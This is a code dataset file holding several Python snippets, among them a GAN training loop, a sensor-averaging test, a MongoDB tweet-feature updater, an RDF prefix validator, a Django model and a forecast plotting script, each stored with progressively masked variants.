all_score_temp=[]\n tik=time.clock()\n print(\"Epoch %d\" %e)\n for _ in tqdm(range(batch_size)):\n #generate random noise as an input to initialize the generator\n noise= scale*np.random.normal(0,1, [batch_size, 100])\n noise=noise.reshape(batch_size,100,1)\n # Generate fake MNIST images from noised input\n generated_images = generator.predict(noise)\n generated_images = generated_images.reshape(batch_size,SampleNum,1)\n# print(generated_images.shape)\n # Get a random set of real images\n# random.seed(0)\n image_batch =X_train_temp[rnd[e-1]]\n# print(image_batch.shape)\n #Construct different batches of real and fake data \n X= np.concatenate([image_batch, generated_images])\n \n # Labels for generated and real data\n y_dis=np.zeros(2*batch_size)\n y_dis[:batch_size]=0.9\n \n #Pre train discriminator on fake and real data before starting the gan. \n discriminator.trainable=True\n discriminator.train_on_batch(X, y_dis)\n \n #Tricking the noised input of the Generator as real data\n noise= scale*np.random.normal(0,1, [batch_size, 100])\n noise=noise.reshape(batch_size,100,1)\n y_gen = np.ones(batch_size)\n \n # During the training of gan, \n # the weights of discriminator should be fixed. \n #We can enforce that by setting the trainable flag\n discriminator.trainable=False\n \n #training the GAN by alternating the training of the Discriminator \n #and training the chained GAN model with Discriminator’s weights freezed.\n gan.train_on_batch(noise, y_gen)\n \n rate=1000\n shift=N/rate\n all_score_temp=[]\n for i in range(rate-1):\n temp=discriminator.predict_on_batch(X_train_temp[int(i*shift):int((i+1)*shift)])\n all_score_temp.append(temp)\n # print(i)\n all_score_temp=np.array(all_score_temp)\n all_score_temp=all_score_temp.ravel()\n all_scores.append(all_score_temp)\n toc = time.clock()\n print(toc-tik)\n \n\n#%%\nkk=['L1MAG']\nfor idx,key in enumerate(kk):\n X_train_temp=X_train[:,(idx)]\n#X_train.reshape(N,3*SampleNum)\n X_train_temp=X_train_temp.reshape(N,SampleNum,1)\n tic = time.clock() \n training(generator,discriminator,gan,epochnum,batch_size,all_scores)\n toc = time.clock()\n print(toc-tic)\n# \n# gan_name='gan_sep_onelearn_good_09_'+key+'.h5'\n# gen_name='gen_sep_onelearn_good_09_'+key+'.h5'\n# dis_name='dis_sep_onelearn_good_09_'+key+'.h5'\n# print(dis_name)\n# gan.save(gan_name)\n# generator.save(gen_name)\n# discriminator.save(dis_name)\n\n \n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
def twoSensorAvg(input_data, duration=1):
times = {}
for i in input_data:
data = i.split(',')
time = int(int(data[1]) / (duration * 1000))
if time not in times:
times[time] = [0, 0]
times[time][0] += int(data[2])
times[time][1] += 1
ans = []
for i, v in times.items():
i = int(i)
a = str(i * duration * 1000) + '-' + str(i * duration * 1000 + 1000 *
(duration - 1) + 999) + ': ' + str(round(float(v[0] / v[1]), 2))
ans.append(a)
return ans
def test(input, output, duration):
results = twoSensorAvg(input, duration)
print(results)
if len(results) != len(output):
return False
for i in range(len(output)):
if results[i] != output[i]:
return False
return True
if __name__ == '__main__':
input_data = ['1,10000,40', '1,10002,45', '1,11015,50', '2,10005,42',
'2,11051,45', '2,12064,42', '2,13161,42']
ans = ['10000-10999: 42.33', '11000-11999: 47.5', '12000-12999: 42.0',
'13000-13999: 42.0']
print(test(input_data, ans, 1))
|
normal
|
{
"blob_id": "836d712c811079f190eae9c2780131a844c9dddf",
"index": 3044,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef test(input, output, duration):\n results = twoSensorAvg(input, duration)\n print(results)\n if len(results) != len(output):\n return False\n for i in range(len(output)):\n if results[i] != output[i]:\n return False\n return True\n\n\n<mask token>\n",
"step-3": "def twoSensorAvg(input_data, duration=1):\n times = {}\n for i in input_data:\n data = i.split(',')\n time = int(int(data[1]) / (duration * 1000))\n if time not in times:\n times[time] = [0, 0]\n times[time][0] += int(data[2])\n times[time][1] += 1\n ans = []\n for i, v in times.items():\n i = int(i)\n a = str(i * duration * 1000) + '-' + str(i * duration * 1000 + 1000 *\n (duration - 1) + 999) + ': ' + str(round(float(v[0] / v[1]), 2))\n ans.append(a)\n return ans\n\n\ndef test(input, output, duration):\n results = twoSensorAvg(input, duration)\n print(results)\n if len(results) != len(output):\n return False\n for i in range(len(output)):\n if results[i] != output[i]:\n return False\n return True\n\n\n<mask token>\n",
"step-4": "def twoSensorAvg(input_data, duration=1):\n times = {}\n for i in input_data:\n data = i.split(',')\n time = int(int(data[1]) / (duration * 1000))\n if time not in times:\n times[time] = [0, 0]\n times[time][0] += int(data[2])\n times[time][1] += 1\n ans = []\n for i, v in times.items():\n i = int(i)\n a = str(i * duration * 1000) + '-' + str(i * duration * 1000 + 1000 *\n (duration - 1) + 999) + ': ' + str(round(float(v[0] / v[1]), 2))\n ans.append(a)\n return ans\n\n\ndef test(input, output, duration):\n results = twoSensorAvg(input, duration)\n print(results)\n if len(results) != len(output):\n return False\n for i in range(len(output)):\n if results[i] != output[i]:\n return False\n return True\n\n\nif __name__ == '__main__':\n input_data = ['1,10000,40', '1,10002,45', '1,11015,50', '2,10005,42',\n '2,11051,45', '2,12064,42', '2,13161,42']\n ans = ['10000-10999: 42.33', '11000-11999: 47.5', '12000-12999: 42.0',\n '13000-13999: 42.0']\n print(test(input_data, ans, 1))\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
'''
Created on Sep 23, 2016
@author: Andrew
'''
from pymongo import MongoClient
import re
client = MongoClient()
atMentions = re.compile(ur"@\w+", flags=re.I|re.U)
atMidnight = re.compile(u"@midnight", flags=re.I|re.U)
hashtag = re.compile(ur"#\w+", flags=re.I|re.U)
features = [("usf fwa forward most", "usf fwa backward most", "usf fwa difference most", "usf fwa difference most sign"), ("usf fwa forward least", "usf fwa backward least", "usf fwa difference least", "usf fwa difference least sign"), ("usf fwa forward average", "usf fwa backward average", "usf fwa difference average", "usf fwa difference average sign")]
cols = ["GentlerSongs", "OlympicSongs", "OceanMovies", "BoringBlockbusters"]
p_values = []
for featureF, featureB, featureD, featureS in features:
print "Testing {} vs {}".format(featureF, featureB)
lessMoreDiff = [] #holds difference in feature value for less funny - more funny
for col in cols:
tweets = []
for tweet in client.tweets[col].find({"$and" : [{"total likes" : {"$gte" : 7}}, {featureF : {"$exists" : True}}, {featureB : {"$exists" : True}}]}):
if "punch words" not in tweet:
continue
if (tweet["punch words"] == None) or (tweet["punch words"] == []):
continue
for word in tweet["punch words"]:
if word == "None":
continue
if not word:
continue
mentions = atMentions.findall(tweet["text"])
if len(mentions) > 1: #if more than 1 person is mentione
continue
elif len(mentions) == 1:
if not atMidnight.match(mentions[0]): #if the mention someone other than @midngiht
continue
if len(hashtag.findall(tweet["text"])) > 1: #if there's more than 1 hashtag
continue
if (tweet[featureF] > 0) and (tweet[featureB] > 0):
tweet[featureD] = tweet[featureF] - tweet[featureB]
sign = 0 #assume forward and back are equal
if (tweet[featureF] - tweet[featureB]) > 0:
sign = 1
elif ((tweet[featureF] - tweet[featureB])) < 0:
sign = -1
tweet[featureS] = sign
client.tweets[col].update({"_id" : tweet["_id"]}, tweet)
|
normal
|
{
"blob_id": "eb2bb06afb9aeb46ad02cbac145ccd817131074d",
"index": 1753,
"step-1": "'''\r\nCreated on Sep 23, 2016\r\n\r\n@author: Andrew\r\n'''\r\nfrom pymongo import MongoClient\r\nimport re\r\n\r\nclient = MongoClient()\r\n\r\natMentions = re.compile(ur\"@\\w+\", flags=re.I|re.U)\r\natMidnight = re.compile(u\"@midnight\", flags=re.I|re.U)\r\nhashtag = re.compile(ur\"#\\w+\", flags=re.I|re.U)\r\nfeatures = [(\"usf fwa forward most\", \"usf fwa backward most\", \"usf fwa difference most\", \"usf fwa difference most sign\"), (\"usf fwa forward least\", \"usf fwa backward least\", \"usf fwa difference least\", \"usf fwa difference least sign\"), (\"usf fwa forward average\", \"usf fwa backward average\", \"usf fwa difference average\", \"usf fwa difference average sign\")]\r\ncols = [\"GentlerSongs\", \"OlympicSongs\", \"OceanMovies\", \"BoringBlockbusters\"]\r\np_values = []\r\nfor featureF, featureB, featureD, featureS in features:\r\n print \"Testing {} vs {}\".format(featureF, featureB)\r\n lessMoreDiff = [] #holds difference in feature value for less funny - more funny\r\n for col in cols:\r\n tweets = []\r\n for tweet in client.tweets[col].find({\"$and\" : [{\"total likes\" : {\"$gte\" : 7}}, {featureF : {\"$exists\" : True}}, {featureB : {\"$exists\" : True}}]}):\r\n if \"punch words\" not in tweet:\r\n continue\r\n if (tweet[\"punch words\"] == None) or (tweet[\"punch words\"] == []):\r\n continue\r\n for word in tweet[\"punch words\"]:\r\n if word == \"None\":\r\n continue\r\n if not word:\r\n continue\r\n mentions = atMentions.findall(tweet[\"text\"])\r\n if len(mentions) > 1: #if more than 1 person is mentione\r\n continue\r\n elif len(mentions) == 1:\r\n if not atMidnight.match(mentions[0]): #if the mention someone other than @midngiht\r\n continue\r\n if len(hashtag.findall(tweet[\"text\"])) > 1: #if there's more than 1 hashtag\r\n continue\r\n \r\n if (tweet[featureF] > 0) and (tweet[featureB] > 0):\r\n tweet[featureD] = tweet[featureF] - tweet[featureB]\r\n sign = 0 #assume forward and back are equal\r\n if (tweet[featureF] - tweet[featureB]) > 0:\r\n sign = 1\r\n elif ((tweet[featureF] - tweet[featureB])) < 0:\r\n sign = -1\r\n tweet[featureS] = sign\r\n client.tweets[col].update({\"_id\" : tweet[\"_id\"]}, tweet)\r\n \r\n ",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
cardlist = []
card = []
for j in range(1,5):
for k in range(1,14):
if j == 1:
cardlist.append(["S", "{}".format(k)])
elif j == 2:
cardlist.append(["H", "{}".format(k)])
elif j == 3:
cardlist.append(["C", "{}".format(k)])
elif j == 4:
cardlist.append(["D", "{}".format(k)])
num = int(input())
for i in range(num):
card.append(input().split())
for i in range(num):
cardlist.remove(card[i])
for i in range(52-num):
print("{0} {1}".format(cardlist[i][0], cardlist[i][1]))
|
normal
|
{
"blob_id": "937a101cf5c7e943fc62d18b77357eea151fdfaf",
"index": 7789,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor j in range(1, 5):\n for k in range(1, 14):\n if j == 1:\n cardlist.append(['S', '{}'.format(k)])\n elif j == 2:\n cardlist.append(['H', '{}'.format(k)])\n elif j == 3:\n cardlist.append(['C', '{}'.format(k)])\n elif j == 4:\n cardlist.append(['D', '{}'.format(k)])\n<mask token>\nfor i in range(num):\n card.append(input().split())\nfor i in range(num):\n cardlist.remove(card[i])\nfor i in range(52 - num):\n print('{0} {1}'.format(cardlist[i][0], cardlist[i][1]))\n",
"step-3": "cardlist = []\ncard = []\nfor j in range(1, 5):\n for k in range(1, 14):\n if j == 1:\n cardlist.append(['S', '{}'.format(k)])\n elif j == 2:\n cardlist.append(['H', '{}'.format(k)])\n elif j == 3:\n cardlist.append(['C', '{}'.format(k)])\n elif j == 4:\n cardlist.append(['D', '{}'.format(k)])\nnum = int(input())\nfor i in range(num):\n card.append(input().split())\nfor i in range(num):\n cardlist.remove(card[i])\nfor i in range(52 - num):\n print('{0} {1}'.format(cardlist[i][0], cardlist[i][1]))\n",
"step-4": "cardlist = []\ncard = []\n\nfor j in range(1,5):\n for k in range(1,14):\n if j == 1:\n cardlist.append([\"S\", \"{}\".format(k)])\n elif j == 2:\n cardlist.append([\"H\", \"{}\".format(k)])\n elif j == 3:\n cardlist.append([\"C\", \"{}\".format(k)])\n elif j == 4:\n cardlist.append([\"D\", \"{}\".format(k)])\n\nnum = int(input())\n\nfor i in range(num):\n card.append(input().split())\n\nfor i in range(num):\n cardlist.remove(card[i])\n\nfor i in range(52-num):\n print(\"{0} {1}\".format(cardlist[i][0], cardlist[i][1]))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import argparse
def parse_args():
"""
Parse command-line arguments to train and evaluate a multimodal network for activity recognition on MM-Fit.
:return: Populated namespace.
"""
parser = argparse.ArgumentParser(description='baseline Mask R-CNN')
parser.add_argument('--dataset', required=True,
metavar="/path/to/dataset/",
help='Directory of the dataset')
parser.add_argument('--continue_train', type=str, required=False, default='None',
metavar="/path/to/latest/weights.h5", help="Path to lastest training weights .h5 file")
parser.add_argument('--weight', required=False,
metavar='/path/to/pretrained/weight.h5', help="Path to trained weight")
parser.add_argument('--image', required=False,
metavar='/path/to/testing/image/directory', help="Path to testing image directory")
parser.add_argument('--video', required=False,
metavar='/path/to/testing/image/directory', help="Path to testing image directory")
return parser.parse_args()
|
normal
|
{
"blob_id": "b6527a09f346ee1b7dd446a0ff21995a995481a8",
"index": 6640,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef parse_args():\n \"\"\"\n Parse command-line arguments to train and evaluate a multimodal network for activity recognition on MM-Fit.\n :return: Populated namespace.\n \"\"\"\n parser = argparse.ArgumentParser(description='baseline Mask R-CNN')\n parser.add_argument('--dataset', required=True, metavar=\n '/path/to/dataset/', help='Directory of the dataset')\n parser.add_argument('--continue_train', type=str, required=False,\n default='None', metavar='/path/to/latest/weights.h5', help=\n 'Path to lastest training weights .h5 file')\n parser.add_argument('--weight', required=False, metavar=\n '/path/to/pretrained/weight.h5', help='Path to trained weight')\n parser.add_argument('--image', required=False, metavar=\n '/path/to/testing/image/directory', help=\n 'Path to testing image directory')\n parser.add_argument('--video', required=False, metavar=\n '/path/to/testing/image/directory', help=\n 'Path to testing image directory')\n return parser.parse_args()\n",
"step-3": "import argparse\n\n\ndef parse_args():\n \"\"\"\n Parse command-line arguments to train and evaluate a multimodal network for activity recognition on MM-Fit.\n :return: Populated namespace.\n \"\"\"\n parser = argparse.ArgumentParser(description='baseline Mask R-CNN')\n parser.add_argument('--dataset', required=True, metavar=\n '/path/to/dataset/', help='Directory of the dataset')\n parser.add_argument('--continue_train', type=str, required=False,\n default='None', metavar='/path/to/latest/weights.h5', help=\n 'Path to lastest training weights .h5 file')\n parser.add_argument('--weight', required=False, metavar=\n '/path/to/pretrained/weight.h5', help='Path to trained weight')\n parser.add_argument('--image', required=False, metavar=\n '/path/to/testing/image/directory', help=\n 'Path to testing image directory')\n parser.add_argument('--video', required=False, metavar=\n '/path/to/testing/image/directory', help=\n 'Path to testing image directory')\n return parser.parse_args()\n",
"step-4": "import argparse\n\n\ndef parse_args():\n \"\"\"\n Parse command-line arguments to train and evaluate a multimodal network for activity recognition on MM-Fit.\n :return: Populated namespace.\n \"\"\"\n parser = argparse.ArgumentParser(description='baseline Mask R-CNN')\n parser.add_argument('--dataset', required=True,\n metavar=\"/path/to/dataset/\",\n help='Directory of the dataset')\n parser.add_argument('--continue_train', type=str, required=False, default='None',\n metavar=\"/path/to/latest/weights.h5\", help=\"Path to lastest training weights .h5 file\")\n parser.add_argument('--weight', required=False,\n metavar='/path/to/pretrained/weight.h5', help=\"Path to trained weight\")\n parser.add_argument('--image', required=False,\n metavar='/path/to/testing/image/directory', help=\"Path to testing image directory\")\n parser.add_argument('--video', required=False,\n metavar='/path/to/testing/image/directory', help=\"Path to testing image directory\")\n return parser.parse_args()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#Checks if all declared prefixes are used in the RDF File
import glob
import logging
import sys
import Utility as utility
import re
# set log level
logging.basicConfig(level=logging.INFO)
root_path = "../"
rdf_file_extension = {".ttl":"turtle", ".nt":"nt", ".rdf":"application/rdf+xml"}
regex_prefix = {".ttl": r'@prefix(.*?)\n', ".rdf": r'xmlns:(.*?)\n'}
regex_url = {".ttl": r'\<(.*?)\>', ".rdf": r'\"(.*?)\"'}
regex_splitter = {".ttl": ":", ".nt":"nt", ".rdf":"="}
for extension in rdf_file_extension.keys() :
files_to_check = "**/*" + extension
for filename in glob.iglob(root_path + files_to_check, recursive=True):
logging.info("Validating file " + filename)
try:
#Parse file using rdflib
g = utility.parseGraph(filename, rdf_file_extension[extension])
#Read File
content = utility.readFile(filename)
#Get Declared prefixes
declared_prefixes = utility.getDeclaredPrefixesRegex(content, regex_prefix[extension], regex_url[extension], regex_splitter[extension])
#Check redundant declaration
duplicated_prefixes = utility.findDuplicates(declared_prefixes)
#If redundant, raise exception
if len(duplicated_prefixes) > 0:
msg = utility.getErrorMessage(duplicated_prefixes)
raise Exception("Duplicated prefix declaration: {}".format(msg))
if(extension == '.ttl'):
#Remove prefixes from content
content = re.sub(r'@prefix(.*?)\n', '', content)
#Check for prefix usage
unused_prefixes = utility.getUnusedPrefixesRegex(declared_prefixes, content)
elif(extension == '.rdf'):
#Check for prefix usage
used_prefixes = utility.getUsedPrefixesRDF(g)
unused_prefixes = utility.getUnusedPrefixesRDF(declared_prefixes, used_prefixes)
#If there are unused prefixes, raise exception
if len(unused_prefixes) > 0:
msg = utility.getErrorMessage(unused_prefixes)
raise Exception("Unused prefixes:\n {}".format(msg))
except Exception as e:
logging.error(e)
logging.error("Syntaxic error reading turtle file [" +filename+"]")
sys.exit(1)
print("Files syntaxic validation is successful")
|
normal
|
{
"blob_id": "fe406f40b48bf4982e7a48737b6b30514ae1fa71",
"index": 7915,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nlogging.basicConfig(level=logging.INFO)\n<mask token>\nfor extension in rdf_file_extension.keys():\n files_to_check = '**/*' + extension\n for filename in glob.iglob(root_path + files_to_check, recursive=True):\n logging.info('Validating file ' + filename)\n try:\n g = utility.parseGraph(filename, rdf_file_extension[extension])\n content = utility.readFile(filename)\n declared_prefixes = utility.getDeclaredPrefixesRegex(content,\n regex_prefix[extension], regex_url[extension],\n regex_splitter[extension])\n duplicated_prefixes = utility.findDuplicates(declared_prefixes)\n if len(duplicated_prefixes) > 0:\n msg = utility.getErrorMessage(duplicated_prefixes)\n raise Exception('Duplicated prefix declaration: {}'.format(msg)\n )\n if extension == '.ttl':\n content = re.sub('@prefix(.*?)\\\\n', '', content)\n unused_prefixes = utility.getUnusedPrefixesRegex(\n declared_prefixes, content)\n elif extension == '.rdf':\n used_prefixes = utility.getUsedPrefixesRDF(g)\n unused_prefixes = utility.getUnusedPrefixesRDF(\n declared_prefixes, used_prefixes)\n if len(unused_prefixes) > 0:\n msg = utility.getErrorMessage(unused_prefixes)\n raise Exception('Unused prefixes:\\n {}'.format(msg))\n except Exception as e:\n logging.error(e)\n logging.error('Syntaxic error reading turtle file [' + filename +\n ']')\n sys.exit(1)\nprint('Files syntaxic validation is successful')\n",
"step-3": "<mask token>\nlogging.basicConfig(level=logging.INFO)\nroot_path = '../'\nrdf_file_extension = {'.ttl': 'turtle', '.nt': 'nt', '.rdf':\n 'application/rdf+xml'}\nregex_prefix = {'.ttl': '@prefix(.*?)\\\\n', '.rdf': 'xmlns:(.*?)\\\\n'}\nregex_url = {'.ttl': '\\\\<(.*?)\\\\>', '.rdf': '\\\\\"(.*?)\\\\\"'}\nregex_splitter = {'.ttl': ':', '.nt': 'nt', '.rdf': '='}\nfor extension in rdf_file_extension.keys():\n files_to_check = '**/*' + extension\n for filename in glob.iglob(root_path + files_to_check, recursive=True):\n logging.info('Validating file ' + filename)\n try:\n g = utility.parseGraph(filename, rdf_file_extension[extension])\n content = utility.readFile(filename)\n declared_prefixes = utility.getDeclaredPrefixesRegex(content,\n regex_prefix[extension], regex_url[extension],\n regex_splitter[extension])\n duplicated_prefixes = utility.findDuplicates(declared_prefixes)\n if len(duplicated_prefixes) > 0:\n msg = utility.getErrorMessage(duplicated_prefixes)\n raise Exception('Duplicated prefix declaration: {}'.format(msg)\n )\n if extension == '.ttl':\n content = re.sub('@prefix(.*?)\\\\n', '', content)\n unused_prefixes = utility.getUnusedPrefixesRegex(\n declared_prefixes, content)\n elif extension == '.rdf':\n used_prefixes = utility.getUsedPrefixesRDF(g)\n unused_prefixes = utility.getUnusedPrefixesRDF(\n declared_prefixes, used_prefixes)\n if len(unused_prefixes) > 0:\n msg = utility.getErrorMessage(unused_prefixes)\n raise Exception('Unused prefixes:\\n {}'.format(msg))\n except Exception as e:\n logging.error(e)\n logging.error('Syntaxic error reading turtle file [' + filename +\n ']')\n sys.exit(1)\nprint('Files syntaxic validation is successful')\n",
"step-4": "import glob\nimport logging\nimport sys\nimport Utility as utility\nimport re\nlogging.basicConfig(level=logging.INFO)\nroot_path = '../'\nrdf_file_extension = {'.ttl': 'turtle', '.nt': 'nt', '.rdf':\n 'application/rdf+xml'}\nregex_prefix = {'.ttl': '@prefix(.*?)\\\\n', '.rdf': 'xmlns:(.*?)\\\\n'}\nregex_url = {'.ttl': '\\\\<(.*?)\\\\>', '.rdf': '\\\\\"(.*?)\\\\\"'}\nregex_splitter = {'.ttl': ':', '.nt': 'nt', '.rdf': '='}\nfor extension in rdf_file_extension.keys():\n files_to_check = '**/*' + extension\n for filename in glob.iglob(root_path + files_to_check, recursive=True):\n logging.info('Validating file ' + filename)\n try:\n g = utility.parseGraph(filename, rdf_file_extension[extension])\n content = utility.readFile(filename)\n declared_prefixes = utility.getDeclaredPrefixesRegex(content,\n regex_prefix[extension], regex_url[extension],\n regex_splitter[extension])\n duplicated_prefixes = utility.findDuplicates(declared_prefixes)\n if len(duplicated_prefixes) > 0:\n msg = utility.getErrorMessage(duplicated_prefixes)\n raise Exception('Duplicated prefix declaration: {}'.format(msg)\n )\n if extension == '.ttl':\n content = re.sub('@prefix(.*?)\\\\n', '', content)\n unused_prefixes = utility.getUnusedPrefixesRegex(\n declared_prefixes, content)\n elif extension == '.rdf':\n used_prefixes = utility.getUsedPrefixesRDF(g)\n unused_prefixes = utility.getUnusedPrefixesRDF(\n declared_prefixes, used_prefixes)\n if len(unused_prefixes) > 0:\n msg = utility.getErrorMessage(unused_prefixes)\n raise Exception('Unused prefixes:\\n {}'.format(msg))\n except Exception as e:\n logging.error(e)\n logging.error('Syntaxic error reading turtle file [' + filename +\n ']')\n sys.exit(1)\nprint('Files syntaxic validation is successful')\n",
"step-5": "#Checks if all declared prefixes are used in the RDF File\n\nimport glob\nimport logging\nimport sys\nimport Utility as utility\nimport re\n\n# set log level\nlogging.basicConfig(level=logging.INFO)\n\nroot_path = \"../\"\n\nrdf_file_extension = {\".ttl\":\"turtle\", \".nt\":\"nt\", \".rdf\":\"application/rdf+xml\"}\nregex_prefix = {\".ttl\": r'@prefix(.*?)\\n', \".rdf\": r'xmlns:(.*?)\\n'}\nregex_url = {\".ttl\": r'\\<(.*?)\\>', \".rdf\": r'\\\"(.*?)\\\"'}\nregex_splitter = {\".ttl\": \":\", \".nt\":\"nt\", \".rdf\":\"=\"}\n\nfor extension in rdf_file_extension.keys() :\n\tfiles_to_check = \"**/*\" + extension\n\t\t\n\tfor filename in glob.iglob(root_path + files_to_check, recursive=True):\n\t\tlogging.info(\"Validating file \" + filename)\n\n\t\ttry:\n\t\t\t#Parse file using rdflib\n\t\t\tg = utility.parseGraph(filename, rdf_file_extension[extension])\n\n\t\t\t#Read File\n\t\t\tcontent = utility.readFile(filename)\n\n\t\t\t#Get Declared prefixes\n\t\t\tdeclared_prefixes = utility.getDeclaredPrefixesRegex(content, regex_prefix[extension], regex_url[extension], regex_splitter[extension])\n\n\t\t\t#Check redundant declaration\n\t\t\tduplicated_prefixes = utility.findDuplicates(declared_prefixes)\n\t\t\t\n\t\t\t#If redundant, raise exception\n\t\t\tif len(duplicated_prefixes) > 0:\n\t\t\t\tmsg = utility.getErrorMessage(duplicated_prefixes)\n\t\t\t\traise Exception(\"Duplicated prefix declaration: {}\".format(msg))\n\n\t\t\tif(extension == '.ttl'):\n\t\t\t\t#Remove prefixes from content\n\t\t\t\tcontent = re.sub(r'@prefix(.*?)\\n', '', content)\n\n\t\t\t\t#Check for prefix usage\n\t\t\t\tunused_prefixes = utility.getUnusedPrefixesRegex(declared_prefixes, content)\n\n\t\t\telif(extension == '.rdf'):\n\t\t\t\t#Check for prefix usage\n\t\t\t\tused_prefixes = utility.getUsedPrefixesRDF(g)\n\t\t\t\tunused_prefixes = utility.getUnusedPrefixesRDF(declared_prefixes, used_prefixes)\n\n\t\t\t#If there are unused prefixes, raise exception\n\t\t\tif len(unused_prefixes) > 0:\n\t\t\t\tmsg = utility.getErrorMessage(unused_prefixes)\n\t\t\t\traise Exception(\"Unused prefixes:\\n {}\".format(msg))\n\n\t\texcept Exception as e:\n\t\t\t\tlogging.error(e)\n\t\t\t\tlogging.error(\"Syntaxic error reading turtle file [\" +filename+\"]\")\n\t\t\t\tsys.exit(1)\n\nprint(\"Files syntaxic validation is successful\")",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.db import models
from orders.constants import OrderStatus
from subscriptions.models import Subscription
class Order(models.Model):
subscription = models.OneToOneField(
Subscription,
on_delete=models.CASCADE,
related_name='order',
)
order_status = models.CharField(
max_length=50,
choices=OrderStatus.Choices,
default=OrderStatus.IN_PROGRESS,
)
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
email = models.EmailField()
price = models.DecimalField(max_digits=10, decimal_places=2)
# def get_email(self):
# if self.email is None:
# self.email = Subscription.objects.get(client__email=...)
|
normal
|
{
"blob_id": "78ddae64cc576ebaf7f2cfaa4553bddbabe474b7",
"index": 6918,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Order(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Order(models.Model):\n subscription = models.OneToOneField(Subscription, on_delete=models.\n CASCADE, related_name='order')\n order_status = models.CharField(max_length=50, choices=OrderStatus.\n Choices, default=OrderStatus.IN_PROGRESS)\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n email = models.EmailField()\n price = models.DecimalField(max_digits=10, decimal_places=2)\n",
"step-4": "from django.db import models\nfrom orders.constants import OrderStatus\nfrom subscriptions.models import Subscription\n\n\nclass Order(models.Model):\n subscription = models.OneToOneField(Subscription, on_delete=models.\n CASCADE, related_name='order')\n order_status = models.CharField(max_length=50, choices=OrderStatus.\n Choices, default=OrderStatus.IN_PROGRESS)\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n email = models.EmailField()\n price = models.DecimalField(max_digits=10, decimal_places=2)\n",
"step-5": "from django.db import models\n\nfrom orders.constants import OrderStatus\nfrom subscriptions.models import Subscription\n\n\nclass Order(models.Model):\n subscription = models.OneToOneField(\n Subscription,\n on_delete=models.CASCADE,\n related_name='order',\n )\n order_status = models.CharField(\n max_length=50,\n choices=OrderStatus.Choices,\n default=OrderStatus.IN_PROGRESS,\n )\n created = models.DateTimeField(auto_now_add=True)\n updated = models.DateTimeField(auto_now=True)\n email = models.EmailField()\n price = models.DecimalField(max_digits=10, decimal_places=2)\n\n # def get_email(self):\n # if self.email is None:\n # self.email = Subscription.objects.get(client__email=...)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""Produce a multi-panel figure of each output lead time in a forecast
"""
import matplotlib.pyplot as plt
import iris.plot as iplt
from irise import convert
from irise.plot.util import add_map
from myscripts import plotdir
from myscripts.models.um import case_studies
columns = 3
def main(forecast, name, levels, *args, **kwargs):
nt = len(forecast)
rows = (nt / columns) + 1
fig = plt.figure(figsize=(18, 10 * float(rows) / columns))
for n, cubes in enumerate(forecast):
row = n / columns
column = n - row * columns
print(row, column)
ax = plt.subplot2grid((rows, columns), (row, column))
cube = convert.calc(name, cubes, levels=levels)[0]
im = iplt.pcolormesh(cube, *args, **kwargs)
add_map()
ax = plt.subplot2grid((rows, columns), (row, column + 1))
cbar = plt.colorbar(im, cax=ax, orientation='horizontal')
plt.savefig(plotdir + name + '_' + str(levels[0]) +
'_' + str(levels[1][0]) + '.png')
return
if __name__ == '__main__':
forecast = case_studies.generate_season_forecast(2013, 11, 1)
name = 'ertel_potential_vorticity'
levels = ('air_potential_temperature', [320])
main(forecast, name, levels, vmin=0, vmax=10, cmap='cubehelix_r')
|
normal
|
{
"blob_id": "310e6e693cdce6ff71d06eac86214a21bef236d4",
"index": 7425,
"step-1": "<mask token>\n\n\ndef main(forecast, name, levels, *args, **kwargs):\n nt = len(forecast)\n rows = nt / columns + 1\n fig = plt.figure(figsize=(18, 10 * float(rows) / columns))\n for n, cubes in enumerate(forecast):\n row = n / columns\n column = n - row * columns\n print(row, column)\n ax = plt.subplot2grid((rows, columns), (row, column))\n cube = convert.calc(name, cubes, levels=levels)[0]\n im = iplt.pcolormesh(cube, *args, **kwargs)\n add_map()\n ax = plt.subplot2grid((rows, columns), (row, column + 1))\n cbar = plt.colorbar(im, cax=ax, orientation='horizontal')\n plt.savefig(plotdir + name + '_' + str(levels[0]) + '_' + str(levels[1]\n [0]) + '.png')\n return\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef main(forecast, name, levels, *args, **kwargs):\n nt = len(forecast)\n rows = nt / columns + 1\n fig = plt.figure(figsize=(18, 10 * float(rows) / columns))\n for n, cubes in enumerate(forecast):\n row = n / columns\n column = n - row * columns\n print(row, column)\n ax = plt.subplot2grid((rows, columns), (row, column))\n cube = convert.calc(name, cubes, levels=levels)[0]\n im = iplt.pcolormesh(cube, *args, **kwargs)\n add_map()\n ax = plt.subplot2grid((rows, columns), (row, column + 1))\n cbar = plt.colorbar(im, cax=ax, orientation='horizontal')\n plt.savefig(plotdir + name + '_' + str(levels[0]) + '_' + str(levels[1]\n [0]) + '.png')\n return\n\n\nif __name__ == '__main__':\n forecast = case_studies.generate_season_forecast(2013, 11, 1)\n name = 'ertel_potential_vorticity'\n levels = 'air_potential_temperature', [320]\n main(forecast, name, levels, vmin=0, vmax=10, cmap='cubehelix_r')\n",
